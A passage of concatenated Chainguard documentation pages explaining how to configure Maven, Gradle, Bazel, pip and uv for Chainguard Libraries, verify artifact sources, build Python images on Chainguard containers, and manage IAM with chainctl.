repositories are requested again and the version from Chainguard Libraries is used instead of other binaries. Change configuration to access Chainguard Libraries via your repository manager after the changes from the global configuration are implemented. These changes must be performed on all workstations of individual developers and other engineers running relevant application builds. They must also be performed on any build server such as Jenkins, TeamCity, GitHub or other infrastructure that builds the applications or otherwise downloads and uses relevant libraries. Cloudsmith Build configuration to retrieve artifacts from Cloudsmith requires you to authenticate. Use your username and password for Cloudsmith in your build tool configuration. Follow the steps from the global configuration to determine URL and authentication details. JFrog Artifactory Build configuration to retrieve artifacts from Artifactory typically requires you to authenticate and use the identity token in the configuration of your build tool. Follow the steps from the global configuration to determine URL and authentication details. Sonatype Nexus Repository Build configuration to retrieve artifacts from Nexus may require authentication. Use your username and password for Nexus in your build tool configuration. Follow the steps from the global configuration to determine URL and authentication details. Apache Maven Apache Maven is the most widely used build tool in the Java ecosystem. Remove Maven caches Apache Maven uses a local cache of libraries. When adopting Chainguard Libraries for Java you must delete that local cache so that libraries are downloaded again. By default the cache, also known as the local repository, is located in a hidden .m2/repository directory in your user’s home directory. Use the following command to delete it: rm -rf ~/.m2/repository Change Maven configuration Before running a new build you must configure access to Chainguard Libraries for Java. If the administrator for your organization’s repository manager created a new repository or virtual repository or group repository, you must update your settings defined in ~/.m2/settings.xml. A typical setup defines a global mirror (id ecosystems) for all artifacts and configures the URL of the repository group or virtual repository from your repository manager https://repo.example.com/group/. Since the group or virtual repository combines release and snapshot artifacts you must override the built-in central repository and its configuration in an automatically activated profile. <settings> <mirrors> <mirror> <!-- Set the identifier for the server credentials for repository manager access --> <id>chainguard-maven</id> <!--Send all requests to the repository manager --> <mirrorOf>*</mirrorOf> <url>https://repo.example.com/repository/group</url> <!-- Cloudsmith example --> <!-- <url>https://dl.cloudsmith.io/basic/exampleorg/chainguard-maven/maven/</url> --> <!-- JFrog Artifactory example --> <!-- <url>https://example.jfrog.io/artifactory/chainguard-maven/</url> --> <!-- Sonatype Nexus example --> <!-- <url>https://repo.example.com:8443/repository/chainguard-maven/</url> --> </mirror> </mirrors> <!-- Activate repo manager and override central repo from Maven itself with invalid URLs --> <activeProfiles> <activeProfile>repo-manager</activeProfile> </activeProfiles> <profiles> <profile> <id>repo-manager</id> <repositories> <repository> <id>central</id> <url>http://central</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>true</enabled> </snapshots> </repository> </repositories> <pluginRepositories> <pluginRepository> <id>central</id> <url>http://central</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>true</enabled> </snapshots> </pluginRepository> </pluginRepositories> </profile> </profiles> </settings> If your repository manager requires authentication, you must specify credentials for the server. The id value in the server element must match the id value in the mirror configuration - chainguard-maven in the example. The username and password values vary depending on the repository manager and the configured authentication, contact the administrator and refer to the global configuration documentation. <settings> ... <servers> <server> <id>chainguard-maven</id> <username>YOUR_USERNAME_FOR_REPOSITORY_MANAGER</username> <password>YOUR_PASSWORD</password> </server> </servers> </settings> Note that you can use a secret manager application to populate the credentials for each user on their workstation as well as for service applications in your CI/CD pipelines into environment variables, for example CHAINGUARD_JAVA_IDENTITY_ID and CHAINGUARD_JAVA_TOKEN. You can then use an identical server configuration, and therefore settings file, for all users: <settings> ... <servers> <server> <id>chainguard-maven</id> <username>${env.CHAINGUARD_JAVA_IDENTITY_ID}</username> <password>${env.CHAINGUARD_JAVA_TOKEN}</password> </server> </servers> </settings> Refer to the official documentation for the Maven settings file for more details. If the administrator only re-configured the existing repository group or virtual repository, you can trigger a build to initiate use of Chainguard Libraries for Java. If you are not using a repository manager at your organization, you can configure access to the Chainguard Libraries for Java repository directly in your settings or pom files. Note that the order of the repositories in these files is significant and you must configure the chainguard repository to be located on the top of the list. If you organization does not use a repository manager you can configure the Chainguard Libraries for Java repository. Ensure that the Chainguard repository is located above the necessary override for the built-in central repository and any other repositories. The following listing shows a complete ~/.m2/settings.xml file with the desired configuration and placeholder values CG_PULLTOKEN_USERNAME and CG_PULLTOKEN_PASSWORD or environment variables for the pull token detailed in Chainguard Libraries access <settings> <activeProfiles> <activeProfile>chainguard-maven</activeProfile> </activeProfiles> <profiles> <profile> <id>chainguard-maven</id> <repositories> <repository> <id>chainguard</id> <url>https://libraries.cgr.dev/java/</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>false</enabled> </snapshots> </repository> <repository> <id>central</id> <url>https://repo1.maven.org/maven2/</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>false</enabled> </snapshots> </repository> </repositories> <pluginRepositories> <pluginRepository> <id>chainguard</id> <url>https://libraries.cgr.dev/java/</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>false</enabled> </snapshots> </pluginRepository> <pluginRepository> <id>central</id> <url>https://repo1.maven.org/maven2/</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>false</enabled> </snapshots> </pluginRepository> </pluginRepositories> </profile> </profiles> <servers> <server> <id>chainguard</id> <!-- pick up values from environment variables --> <username>${env.CHAINGUARD_JAVA_IDENTITY_ID}</username> <password>${env.CHAINGUARD_JAVA_TOKEN}</password> <!-- or use literal values --> <!-- <username>CG_PULLTOKEN_USERNAME</username> --> <!-- <password>CG_PULLTOKEN_PASSWORD</password> --> </server> </servers> </settings> The preceding settings affects all projects built on the machine where the file is configured. Alternatively you can add the repositories and pluginRepositories to individual project pom.xml files. Authentication details must remain within the settings file. Gradle Gradle is a commonly used build tool in the Java ecosystem. Remove Gradle caches Gradle uses a local cache of libraries. When adopting Chainguard Libraries for Java you must delete that local cache so that libraries are downloaded again. By default the cache is located in a hidden .gradle/.cache directory in your users home directory. Use the following command to delete it: rm -rf ~/.gradle/caches/ Gradle can also be configured to use a local Maven repository with a repository configuration in the global init.gradle or a project specific build.gradle file: repositories { ... mavenLocal() } If this configuration is used, ensure to delete the local Maven repository as well. Change Gradle configuration Before running a new build you must configure access to the Chainguard Libraries for Java. If the administrator for your organization’s repository manager created a new repository or virtual repository or group repository, you must update your Gradle configuration. Artifact download is Gradle can be configured in an init script using the repositories definition. Each project can also declare repositories separately. A typical setup removes the direct reference to Maven Central mavenCentral() and any other repositories, and adds a replacement definition with the URL of the repository group or virtual repository from your repository manager https://repo.example.com/group/ and any applicable authentication details. repositories { maven { url = uri("https://repo.example.com/group/") credentials { username = "YOUR_USERNAME_FOR_REPOSITORY_MANAGER" password = "YOUR_PASSWORD" } } } Example URLs for repository managers: Cloudsmith: https://dl.cloudsmith.io/basic/exampleorg/chainguard-maven/maven/ JFrog Artifactory: https://example.jfrog.io/artifactory/chainguard-maven/ Sonatype Nexus: https://repo.example.com:8443/repository/chainguard-maven/ If your organization does not use a repository manager you can configure the Chainguard Libraries for Java repository with the credentials from Chainguard Libraries access replacing the placeholders CHAINGUARD_JAVA_IDENTITY_ID and CHAINGUARD_JAVA_TOKEN. Ensure that the Chainguard repository is located above the mavenCentral repository and any other repositories: repositories { maven { url = uri("https://libraries.cgr.dev/java/") credentials { username = "CHAINGUARD_JAVA_IDENTITY_ID" password = "CHAINGUARD_JAVA_TOKEN" } } mavenCentral() } Alternatively configure environment variables and access the values: repositories { maven { url = uri("https://libraries.cgr.dev/maven/") credentials { username = "$System.env.CHAINGUARD_JAVA_IDENTITY_ID" password = "$System.env.CHAINGUARD_JAVA_TOKEN" } } mavenCentral() } The following listing shows a valid init.gradle file. It wraps the repositories element with allprojects so that the scope of the file affects all projects built locally with Gradle. It also allows for downloads for plugins and build scripts from the remote URL using buildscript. Lastly the example shows use of an internal repository manager that only serves artifacts without authentication using HTTP only. Since this is not advisable unless other networking setups allow a secure use with HTTP, the override with the property allowInsecureProtocol is required: allprojects { buildscript { repositories { maven { url = "http://repo.example.com:8081/repository/chainguard-maven/" allowInsecureProtocol = true } } } repositories { maven { url = "http://repo.example.com:8081/repository/chainguard-maven/" allowInsecureProtocol = true } } } Bazel Bazel is a fast, scalable, and extensible build tool commonly used in large-scale projects. Remove Bazel caches Bazel uses a cache to store downloaded artifacts. When adopting Chainguard Libraries for Java, you must delete this cache to ensure that libraries are downloaded again. By default, the cache is located in the .cache/bazel on Linux or /private/var/tmp/_bazel_$USER on MacOS directory in your user’s home directory. Use the following command to delete it: bazel clean --expunge The Bazel documentation on output directories contains further details. Change Bazel configuration Before running a new build, you must configure access to Chainguard Libraries for Java. If the administrator for your organization’s repository manager created a new repository or virtual repository, you must update your Bazel configuration to use the repository manager. Bazel uses MODULE.bazel files to define external dependencies as artifacts. You can configure a Maven repository for artifact retrieval using repositories from the rules_jvm_external rule: Following is an example configuration for a repository manager: bazel_dep(name = "rules_jvm_external", version = "6.3") maven = use_extension("@rules_jvm_external//:extensions.bzl", "maven") maven.install( name = "maven", # Example dependencies to retrieve artifacts = [ "com.google.guava:guava:32.0.1-jre", "org.slf4j:slf4j-api:2.0.5", "ch.qos.logback:logback-classic:1.4.7", ], repositories = [ # To use Chainguard Libraries for Java via a repository manager: "https://repo.example.com/repository/chainguard-maven/", ], # Uncomment and configure authentication if needed: # auth = { # "https://repo.example.com/repository/chainguard-maven/": { # "type": "basic", # "username": "YOUR_USERNAME_FOR_REPOSITORY_MANAGER", # "password": "YOUR_PASSWORD", # }, # }, ) use_repo(maven, "maven") Example URLs for repository managers: Cloudsmith: https://dl.cloudsmith.io/basic/exampleorg/chainguard-maven/maven/ JFrog Artifactory: https://example.jfrog.io/artifactory/chainguard-maven/ Sonatype Nexus: https://repo.example.com:8443/repository/chainguard-maven/ If your organization does not use a repository manager, you can configure the Chainguard Libraries for Java repository directly, and include the Maven Central repository as fallback. Replace the placeholders CHAINGUARD_JAVA_IDENTITY_ID and CHAINGUARD_JAVA_TOKEN with the credentials provided by Chainguard: maven.install( name = "maven", # Example dependencies to retrieve artifacts = [ "com.google.guava:guava:32.0.1-jre", "org.slf4j:slf4j-api:2.0.5", "ch.qos.logback:logback-classic:1.4.7", ], repositories = [ # To use Chainguard Libraries directly (requires credentials): "https://libraries.cgr.dev/java/", # Use Maven Central as fallback "https://repo1.maven.org/maven2/", ], auth = { "https://libraries.cgr.dev/java/": { "type": "basic", "username": "CHAINGUARD_JAVA_IDENTITY_ID", "password": "CHAINGUARD_JAVA_TOKEN", }, }, ) Ensure that the Chainguard repository is listed before any other repositories to prioritize it for artifact retrieval. For more complex Bazel setups, you can use .netrc for authentication. Refer to the official Bazel documentation for rules_jvm_external for more detailed configuration options. Other build tools Other build tools such as Apache Ant with the Maven Artifact Resolver Ant Tasks, sbt, Leiningen and others use Maven or Gradle caches or similar approaches. Refer to the documentation of your specific tool and the preceding sections to determine how to remove any used caches. These tools also include their own mechanisms to configure repositories for binary artifact retrieval. Consult the specific documentation and adjust your configuration to use your repository manager and newly created repository group or virtual repository. Example URLs for repository managers: Cloudsmith: https://dl.cloudsmith.io/basic/exampleorg/chainguard-maven/maven/ JFrog Artifactory: https://example.jfrog.io/artifactory/chainguard-maven/ Sonatype Nexus: https://repo.example.com:8443/repository/chainguard-maven/ --- ### Build Configuration URL: https://edu.chainguard.dev/chainguard/libraries/python/build-configuration/ Last Modified: April 7, 2025 Tags: Chainguard Libraries, Python The configuration for the use of Chainguard Libraries depends on how you’ve set up your build tools and CI/CD workflows. At a high level, adopting the use of Chainguard Libraries in your development, build, and deployment workflows involves the following steps: If you or an administrator have not done so already, set up your organization’s repository manager to use Chainguard Libraries for Python. Log into your organization’s repository manager and retrieve credentials for the build tool you are configuration. Configure your development or build tool with this information. Remove local caches on workstations and CI/CD pipelines. This step ensures that dependencies are preferentially sourced from Chainguard Libraries. Finally, confirm that your development tools and CI/CD workflows are correctly ingesting dependencies from Chainguard Libraries. These changes must be performed on all workstations of individual developers and other engineers running relevant application builds. They must also be performed on any build tool such as Jenkins, TeamCity, GitHub Actions, or other infrastructure that draws in dependencies. Retrieving authentication credentials To configure any build tool, you must first access credentials from your organization’s repository manager. Cloudsmith The following steps allow you to determine the URL and authentication details for accessing your organization’s Cloudsmith repository manager. Log into Cloudsmith. Select the Repositories tab and click on the python-all repository. Select the Packages tab. Select Push/Pull Packages on the right. Choose the Python format. Select your desired authentication method for Entitlement tokens and copy the URL to use in your build tool - for example https://dl.cloudsmith.io/.../exampleorg/python-all/python/simple/. In the URL ... is replaced with a default token or your personal token depending on your selection and exampleorg is replaced with the name of your organization. The URL contains both the name of the repository python-all as well as python as an identifier for the format. Alternatively, use the API Key and copy the URL to use in your build tool for example https://username:{{apiKey}}@dl.cloudsmith.io/basic/exampleorg/python-all/python/simple/. Replace username and exampleorg with your Cloudsmith details and replace {{apiKey}} with the API key from the Personal API Keys section from the drop down on your username. Note that for use with build tools you must include the simple/ context so that the package index is used successfully. JFrog Artifactory The following steps allow you to determine the identity token and URL for accessing your organization’s JFrog Artifactory repository manager. Select Administration in the top navigation bar. Select Repositories in the left hand navigation. Select the Virtual tab in the repositories view. Locate the python-all* repository row and press the three dots (…) in the last column on the right. Select Set Me Up in the dialog. Select Generate Token & Create Instructions Copy the generated token value to use as the password for authentication. Select Generate Settings. Copy the value from one of the URL fields. They are all identical. For example, https://exampleorg.jfrog.io/artifactory/python-all with exampleorg. Note that for use with build tools you must append simple/ to the URL so that the package index is used successfully - https://exampleorg.jfrog.io/artifactory/python-all/simple/. Sonatype Nexus Repository The following steps allow you to determine the URL and authentication details for accessing your organization’s Sonatype Nexus repository group. Click Browse in the Welcome view or the browse icon (cube) in the top navigation bar. Locate the URL column for the python-all repository group and press copy. The URL should take the following format: https://repo.example.com/repository/python-all/. Note that for use with build tools you must append simple/ to the URL so that the package index is used successfully - https://repo.example.com/repository/python-all/simple/. No further configuration is necessary if your repository manager is configured for anonymous access with Security - Anonymous Access - Access - Allow anonymous users to access the server is activated. If authentication is required, you must use the relevant details such as username and password in your build tool configuration. Configuring build tools Once you have credentials and the index URL from your organization’s repository manager, you’re ready to set up specific build tools for local development or CI/CD. Authentication pip, uv, poetry, and other Python build and packaging tools have dedicated support for configuring authentication to the repository manager or the Chainguard Libraries for Python directly. As an alternative that works across tools and is often preferred, use .netrc for authentication. pip The pip tool is the most widely used utility for installing Python packages. In this section, we use the credentials from your organization’s repository manager to configure pip to ingest dependencies from Chainguard Libraries. First, let’s clear your local pip cache to ensure that packages are sourced from Chainguard Libraries for Python: pip cache purge To update pip to use our repository manager’s URL globally, create or edit your ~/.pip/pip.conf file. You may need to create the ~/.pip folder as well. For example: mkdir -p ~/.pip nano ~/.pip/pip.conf Update this configuration file with the following, replacing <repository-url> with the URL provided by your repository manager including the simple/ context: [global] index-url = <repository-url> Updating this global configuration affects all projects built on the workstation. Alternately, if your project uses a requirements.txt file in projects, you can add the following to it to configure on a project-by-project basis: --index-url <repository-url> package-name==version Note the different syntax for index-url in the two files. Refer to the official documentation for configuring authentication with pip if you are not using .netrc for authentication. uv uv is a fast Python package and project manager written in Rust. It uses PyPI by default, but also supports the use of alternative package indexes. To update your global configuration to use your organization’s repository manager with uv, create or edit the ~/.config/uv/uv.toml configuration file. You may also need to create the ~/.config/uv/ folder first. For example: mkdir -p ~/.config/uv nano ~/.config/uv/uv.toml Add the following to your uv global configuration file: [[tool.uv.index]] name = "<repository-manager-name>" url = "<repository-url>" Add the name for your repository, such as corppypi, within the quotes. Replace the <repository-url> with the URL provided by your repository manager including the simple/ context. Note that updating the global configuration affects all projects built on the workstation. Alternately, you can update each project by adding the same configuration in pyproject.toml. Refer to the official documentation for configuring authentication with uv and using alternative package indexes if you are not using .netrc for authentication. --- ### Management and Maintenance URL: https://edu.chainguard.dev/chainguard/libraries/java/management/ Last Modified: April 3, 2025 Tags: Chainguard Libraries, Java After the initial global configuration and build configuration the use of Chainguard Libraries for Java is transparently in progress. Newly use artifacts from new projects or new artifact versions are automatically retrieved from the Chainguard repository as they are available and the Maven Central Repository and other configure repositories serve as backstop to provide any additionally needed artifacts. The following sections detail optional management, maintenance, and auditing steps on the repository manager and the build tool. Source verification You can verify what artifacts are retrieved from the Chainguard Libraries repository on a global level: Browse the chainguard proxy repository on your Artifactory or Nexus server. Access the Packages tab of the repository on your Cloudsmith instance. Filter the package list with the tag value with the name for your upstream proxy for Chainguard, for example tag:chainguard. The tag uses the name of the upstream proxy, with spaces replaced with dashes. Use the browsing access to locate specific artifacts and identify their name, file size, checksum values, timestamp and other identifiers. With these details you can verify your libraries use in the following locations: Local cache repositories on developer workstation Cache repositories in your CI pipeline Libraries in your application bundles Installed applications on your hosts or in your container images A uniquely identifying characteristic of library artifacts are their checksums. Contrary to filenames and timestamps, checksums do not change in the use of libraries during an application build or the assembly of a deployment artifact like a tarball or container. This allows you to identify a library artifact by determining the checksum and then locating it in your repository manager. Calculate the different commonly used sums for a file example.jar with the following commands and output examples: $ sha1sum example.jar aea83e64ebec6a37e0be100f968a55fb381143c2 example.jar $ sha256sum example.jar 87a25c44e0fdb0c71e898c57f67b236d2205bfa76a25dbbb9779ebe2f93e787e example.jar $ md5sum example.jar fefd660ddc795900d48bdf49c17b3135 example.jar Use the search features in your repository manager, such as Sonatype Nexus, to locate the library. For the specific example, you find that the checksums correspond to the file junit-4.13.2.jar found in junit/junit/4.13.2/ and that the artifact is found in the chainguard proxy repository. You can therefore conclude that the example.jar file originates from Chainguard, was built in the Chainguard Factory from source, and is available at https://libraries.cgr.dev/java/junit/junit/4.13.2/junit-4.13.2.jar. You can manually download the file to compare, if desired. Increase Chainguard Library use The number of available artifacts in Chainguard Libraries for Java increases over time. If an artifact was already retrieved from the Maven Central Repository and is available in your repository manager or local repository it is not automatically replaced with the equivalent Chainguard Library version. You can force a download of new libraries by erasing them from your local repositories on your workstations and the Maven Central proxy repository in your repository manager. Both these repositories are caches only and it is therefore safe to delete them. After the deletion any new build retrieves the artifact again and attempts to download from the Chainguard repository. As a result, newly available artifacts replace old artifacts that originated from Maven Central and your use of Chainguard Libraries increased. For a more fine-grained approach you can also delete subsections of local repositories and the proxy repositories. --- ### Management and Maintenance URL: https://edu.chainguard.dev/chainguard/libraries/python/management/ Last Modified: April 3, 2025 Tags: Chainguard Libraries, Python After the initial global configuration and build configuration the use of Chainguard Libraries for Python is transparently in progress. Newly use artifacts from new projects or new artifact versions are automatically retrieved from the Chainguard repository as they are available and the PyPI repository and other configured repositories serve as backstop to provide any additionally needed artifacts. The following sections detail optional management, maintenance, and auditing steps on the repository manager and the build tool. Source Verification You can verify what artifacts are retrieved from the Chainguard Libraries repository on a global level: Browse the chainguard proxy repository on your Artifactory or Nexus server. Access the Packages tab of the the repository on your Cloudsmith instance. Filter the package list with the tag value with the name for your upstream proxy for Chainguard, for example tag:chainguard. The tag uses the name of the upstream proxy, with spaces replaced with dashes. Use the browsing access to locate specific artifacts and identify their name, filesize, checksum values, timestamp and other identifiers. With these details you can verify your libraries use in the following locations: Local cache repositories on developer workstation Cache repositories in your CI pipeline Libraries in your application bundles Installed applications on your hosts or in your container images Increase Chainguard Library Use The number of available artifacts in Chainguard Libraries for Python increases over time. If an artifact was already retrieved from the PyPI Repository and is available in your repository manager or local repository it is not automatically replaced with the equivalent Chainguard Library version. You can force a download of new libraries by erasing them from your local repositories on your workstations and the PyPI proxy repository in your repository manager. Both these repositories are caches only and it is therefore safe to delete them. After the deletion any new build retrieves the artifact again and attempts to download from the Chainguard repository. As a result, newly available artifacts replace old artifacts that originated from PyPI and your use of Chainguard Libraries increased. For a more fine-grained approach you can also delete subsections of local repositories and the proxy repositories. --- ### Getting Started with the Python Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/python/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The Python container images based on Wolfi and maintained by Chainguard provide distroless images that are suitable for building and running Python workloads. Chainguard offers both a minimal runtime image containing just Python, and a development image that contains a package manager and a shell. Because Python applications typically require the installation of third-party dependencies via the Python package installer pip, you may need to implement a multi-stage Docker build that uses the Python -dev image to set up the application. In this guide, we’ll cover two examples to showcase Python container images based on Wolfi as a runtime. In the first, we’ll use the minimal image containing just Python (which has access to the Python standard library), and in the second we’ll demonstrate a multi-stage build. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Example 1 — Minimal Python Chainguard Container In this example, we’ll build and run a distroless Python Chainguard Container in a single-stage build process. We’ll first make a demonstration app and then build and run it. Step 1: Setting up a Demo Application We’ll start by creating a basic command-line Python application to serve as a demo. This app will generate random octopus facts based on a list in a text file. This app will use the random module from the Python standard library. First, create a directory for your app. You can use any meaningful name and path for you, our example will use octo-facts/. mkdir ~/octo-facts/ && cd $_ Create a new file to serve as the application entry point. We’ll use main.py. You can edit this file in whatever code editor you would like. We’ll use Nano as an example. nano main.py The following Python script defines a light CLI app that takes in a text file, octo-facts.txt, and returns a random line from that file. '''Import random module to implement random.choice() function''' import random def random_line(text): '''Opens and reads lines of a UTF-8 encoded file, returning a random line''' with open(text, 'r', encoding='UTF-8') as file: line = file.readlines() return random.choice(line) def main(): '''Prints random line from facts.txt; verify your path''' print(random_line('facts.txt')) if __name__ == "__main__": main() Copy this code to your main.py script, save and close the file. Next, pull down the facts.txt file with curl. Inspect the URL before downloading it to ensure it is safe to do so. Make sure you are still in the same directory where your main.py script is. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/main/python/octo-facts/facts.txt At this point, you can run the script and be sure you are satisfied with the functionality. It is recommended that you use a Python programming environment. Ensure whether you will be using the python or python3 command. python main.py You should receive the output of a randomized octopus fact. The wolfi octopus was discovered in 1913. The demo application is now ready. In the next step, you’ll create a Dockerfile to run your app. Step 2: Creating the Dockerfile For this single-stage build, we’ll only use one FROM line in our Dockerfile. Our resulting container will be based on the distroless Python Wolfi container image, which means it doesn’t come with a package manager or even a shell. We’ll begin by creating a Dockerfile. Again, you can use any code editor of your choice, we’ll use Nano for demonstration purposes. nano Dockerfile The following Dockerfile will: Start a build stage based on the python:latest image; Declare the working directory; Copy the script and the text file that’s being read; Set up the application as entry point for this container. FROMcgr.dev/chainguard/python:latestWORKDIR/octo-factsCOPY main.py facts.txt ./ENTRYPOINT [ "python", "/octo-facts/main.py" ]Save the file when you’re finished. You can now build the container image. If you receive an error, try again with sudo. docker build . --pull -t octo-facts Once the build is finished, run the container. docker run --rm octo-facts And you should get output similar to what you got before, with a random octopus fact. Octopuses can breathe and see through their skin. You have successfully completed the single-stage Python Chainguard Container. At this point, you can continue to the multi-stage example or advanced usage. Example 2 — Multi-Stage Build for Python Chainguard Container In this example, we’ll build and run a multi-stage Python Chainguard Container. We’ll have a build image that includes pip and a shell before creating a final distroless image without these development tools for production. Step 1: Setting up a Demo Application We’ll start by creating a Python application that will take in an image file and convert it to ANSI escape sequences on the CLI to render an image. To begin, create a directory for your app. You can use any meaningful name and path that resonates with you, our example will use linky/. mkdir ~/linky/ && cd $_ We’ll first write out the requirements for our app in a new file, for example we named our file requirements.txt. You can edit this file in your preferred code editor, in our case we will use Nano. nano requirements.txt We’ll use version 68.2.2 of Python setuptools and also install climage. We need to use a slightly older version of setuptools for compatibility with climage. Add the following text to the file: setuptools==70.0.0 climage==0.2.0 Save the file and we will next create a new file with our python code called linky.py. You can edit this file in whatever code editor you would like. We’ll use Nano as an example. nano linky.py Add the following Python code which defines a CLI app that takes in an image file, linky.png, and prints a representation of that file to the terminal: '''import climage module to display images on terminal''' from climage import convert def main(): '''Take in PNG and output as ANSI to terminal''' output = convert('linky.png', is_unicode=True) print(output) if __name__ == "__main__": main() Next, pull down the linky.png image file with curl. Inspect the URL before downloading it to ensure it is safe to do so. Make sure you are still in the same directory where your linky.py script is. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/main/python/linky/linky.png If you have python and pip installed in your local environment, you can now install the dependencies with pip and run our program. Don’t worry if you don’t have python installed, you can simply skip this step and move onto the Dockerfile. pip install -r requirements.txt python linky.py You’ll receive a representation of the Chainguard Linky logo on the command line. With your demo application ready, you’re ready to move onto the container stage. Step 2: Creating the Dockerfile To make sure our final container is distroless while still being able to install dependencies with pip, our build will consist of two stages: first, we’ll build the application using the python:latest-dev image variant, a Wolfi-based image that includes pip and other useful tools for development. Then, we’ll create a separate stage for the final image. The resulting container will be based on the distroless Python Wolfi container image, which means it doesn’t come with pip or even a shell. Begin by editing a Dockerfile, with Nano for instance. nano Dockerfile The following Dockerfile will: Start a new build stage based on the python:latest-dev container image and call it builder; Create a new virtual environment to cleanly hold the application’s dependencies; Copy requirements.txt from the current directory to the /linky location in the container; Run pip install --no-cache-dir -r requirements.txt to install dependencies; Start a new build stage based on the python:latest image; Copy the dependencies in the virtual environment from the builder stage, and the source code from the current directory; Set up the application as the entry point for this container. Copy this configuration to your own Dockerfile: FROMcgr.dev/chainguard/python:latest-dev AS builderENV LANG=C.UTF-8ENV PYTHONDONTWRITEBYTECODE=1 ENV PYTHONUNBUFFERED=1 ENV PATH="/linky/venv/bin:$PATH"WORKDIR/linkyRUN python -m venv /linky/venvCOPY requirements.txt .RUN pip install --no-cache-dir -r requirements.txtFROMcgr.dev/chainguard/python:latestWORKDIR/linkyENV PYTHONUNBUFFERED=1 ENV PATH="/venv/bin:$PATH"COPY linky.py linky.png ./COPY --from=builder /linky/venv /venvENTRYPOINT [ "python", "/linky/linky.py" ]Save the file when you’re finished. You can now build the container image. If you receive a permission error, try running under sudo. docker build . --pull -t linky Once the build is finished, run the image with: docker run --rm linky And you should get output similar to what you got before, with a printed Linky on the command line. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Python Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Manage Identity and Access with chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/chainctl-iam/ Last Modified: May 13, 2025 Tags: chainctl, iam, Product, authentication, access, identity, management Identity and access management (IAM) enables your organization to control access to various resources and actions. This page demonstrates how to use the chainctl iam command to perform the most common tasks. For the following, assume that returned information only includes that which your account has permissions to view. Also, actions such as create and delete are similarly limited. This page is intended as an introductory overview of IAM with chainctl. For a full reference of all commands with details and switches, see chainctl Reference. List Folders Folders contain the catalogs of things your organization has access to. Find out what folders are available to your organization with: chainctl iam folders list $ORGANIZATION_NAME For example, for our Developer Enablement team, which uses the chainguard.edu organization, the interaction looks like this: $ chainctl iam folders list chainguard.edu [chainguard.edu] Developer Enablement images catalog This command can also delete, describe, and update folders by replacing list with delete, describe, or update. See the reference guide for more details. List and Describe Identities To list all of the existing identities along with roles, types, and more, use: chainctl iam identities list Because this command requests a large amount of information, you may find it useful to direct the output into a file or pipe it into a filter. If you know the specific IDENTITY_NAME or IDENTITY_ID that you want to know more about, use: chainctl iam identities describe {IDENTITY_NAME | IDENTITY_ID} This command can also create, delete, describe, and update identities by replacing list with create, delete, describe, or update. See the reference guide for more details. List and Create Identity Providers This command enables you to manage your own identity management provider, such as a custom OIDC provider. To list all currently configured identity management providers, use: chainctl iam identity-providers list This command can also create, delete, and update your organization’s identity providers by replacing list with create, delete, or update. See the reference guide for more details. To tell chainctl about your OIDC provider and enable users to start using it, use create: chainctl iam identity-provider create --name=google --parent=example \ --oidc-issuer=https://accounts.google.com \ --oidc-client-id=foo \ --oidc-client-secret=bar \ --default-role=viewer List and Create Invites This command lets you manage invite codes that register identities with Chainguard. To list current invites, use: chainctl iam invites list This will return a list of invites by ID with information about the invite’s expiration date, associated roles, and keyID. This command can also create and delete invites by replacing list with create or delete. See the reference guide for more details. To create a new invite, use create, like in this example that defines a role, an email address to tie the invite to, the valid length of the invitation, and that it can only be used once: chainctl iam invite create ORGANIZATION_NAME --role=viewer --email=sandra@organization.dev --ttl=7d --single-use List organizations To list all of the organizations your account is associated with, use: chainctl iam organizations list Most users will only be associated with one organization, but admin and support users may find using this command especially useful to determine whether they have needed permissions to interact with specific organizations when help is needed. This command can also delete and describe organizations by replacing list with delete or describe. See the reference guide for more details. List roles To list all of the roles your account is associated with, use: chainctl iam roles list This command can also create, delete, and update identities by replacing list with create, delete or update. It is possible to define role details during creation or create a role interactively. To create a role interactively, use: chainctl iam roles create ROLE_NAME To find out what actions can be done by each role, use: chainctl iam roles capabilities list This returns a list like this sample: $ chainctl iam roles capabilities list RESOURCE | ACTION -------------------------+----------------------------------------- account_associations | create, delete, list, update attestations | list build_report | list clusters | create, delete, discover, list, update group_invites | create, delete, list groups | create, delete, list, update identity | create, delete, list, update identity_providers | create, delete, list, update libraries.entitlements | create, delete, list libraries.java | list libraries.python | list manifest | create, delete, list, update manifest.metadata | list namespaces | list nodes | list policy | create, delete, list, update record_contexts | list record_policy_results | list record_signatures | list records | list registry.entitlements | list repo | create, delete, list, update risks | list role_bindings | create, delete, list, update roles | create, delete, list, update sboms | list sigstore | create, delete, list, update sigstore.certificate | create subscriptions | create, delete, list, update tag | create, delete, list, update version | list vuln | create vuln_report | create, list vuln_reports | list workloads | list To find out about role bindings, use: chainctl iam role-bindings list The chainctl iam role-bindings command can also create, delete, and update identities by replacing list with create, delete or update. --- ### Getting Started with the PyTorch Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/pytorch/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product, AI Chainguard offers a minimal, low-CVE container image for deep learning with PyTorch that includes support for the CUDA parallel computing platform for performing computation on supported GPUs. This introductory guide to 